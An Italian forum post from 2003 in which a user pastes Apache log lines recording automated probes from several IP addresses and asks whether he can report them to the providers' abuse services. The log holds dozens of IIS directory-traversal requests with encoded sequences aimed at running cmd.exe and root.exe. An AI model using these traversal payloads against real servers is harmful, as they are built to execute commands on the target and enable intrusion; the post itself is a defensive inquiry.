attacco hackers????

**Ratatuia** · 21-01-2003, 08:47

questa notte ho lasciato acceso il mio apache sul computer per lasciar scaricare un file...oltre all'ip di questo mio amico che ha scaricato il file, ci sono altri ip (uno tedesco,uno italiano, uno spagnolo) con chiamate a funzioni di sistema...

vi metto un estratto...

codice:

80.180.42.220 - - [19/Jan/2003:23:41:31 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
80.180.42.220 - - [19/Jan/2003:23:41:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
80.180.42.220 - - [19/Jan/2003:23:41:35 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.220 - - [19/Jan/2003:23:41:47 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.220 - - [19/Jan/2003:23:41:50 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.220 - - [19/Jan/2003:23:41:51 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.220 - - [19/Jan/2003:23:41:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.220 - - [19/Jan/2003:23:41:54 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
80.180.42.220 - - [19/Jan/2003:23:41:58 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:58 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:58 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:59 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:59 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.220 - - [19/Jan/2003:23:42:02 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.220 - - [19/Jan/2003:23:42:03 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.220 - - [19/Jan/2003:23:42:06 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.190 - - [20/Jan/2003:21:52:13 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
80.180.42.190 - - [20/Jan/2003:21:52:14 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
80.180.42.190 - - [20/Jan/2003:21:52:20 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.190 - - [20/Jan/2003:21:52:24 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.190 - - [20/Jan/2003:21:52:27 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.190 - - [20/Jan/2003:21:52:28 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.190 - - [20/Jan/2003:21:52:30 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.190 - - [20/Jan/2003:21:52:32 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
80.180.42.190 - - [20/Jan/2003:21:52:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:36 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:38 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:40 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:42 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.190 - - [20/Jan/2003:21:52:44 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.190 - - [20/Jan/2003:21:52:46 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.190 - - [20/Jan/2003:21:52:51 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.132.198.70 - - [21/Jan/2003:01:49:02 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
80.132.198.70 - - [21/Jan/2003:01:49:04 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
80.132.198.70 - - [21/Jan/2003:01:49:06 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.132.198.70 - - [21/Jan/2003:01:49:09 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.132.198.70 - - [21/Jan/2003:01:49:12 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.132.198.70 - - [21/Jan/2003:01:49:15 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.132.198.70 - - [21/Jan/2003:01:49:18 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.132.198.70 - - [21/Jan/2003:01:49:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
80.132.198.70 - - [21/Jan/2003:01:49:24 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:27 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:32 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:35 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.132.198.70 - - [21/Jan/2003:01:49:38 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.132.198.70 - - [21/Jan/2003:01:49:41 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.36.73.35 - - [21/Jan/2003:05:13:20 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273

vi sono gli estremi x segnalarlo ai servizi di abuse dei rispettivi provider???

ciao
ratatuia

Discussione: attacco hackers????

Strumenti discussione

Ricerca discussione

Visualizza

Hybrid View

attacco hackers????

Permessi di invio